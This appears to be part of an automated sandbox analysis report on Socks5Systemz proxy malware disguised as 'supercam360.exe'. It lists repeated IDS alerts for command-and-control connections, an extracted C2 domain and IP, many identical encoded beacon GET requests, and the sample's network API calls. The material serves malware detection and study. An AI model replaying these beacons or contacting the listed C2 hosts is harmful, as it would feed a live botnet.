                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49840 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49809 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49809 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49833 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49833 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49916 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49916 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49865 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49816 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49895 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49895 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49816 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49872 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49872 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49865 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49859 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49859 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49821 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49821 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49921 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49921 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49878 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49878 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49889 -> 185.196.9.67:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49889 -> 185.196.9.67:80
                    Source: Malware configuration extractorURLs: ceijjfu.net
                    Source: Joe Sandbox ViewASN Name: SIMPLECARRIERCH SIMPLECARRIERCH
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: unknownUDP traffic detected without corresponding DNS query: 152.89.198.214
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_02D672AB Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_strtok,_swscanf,_strtok,_free,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_free,5_2_02D672AB
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
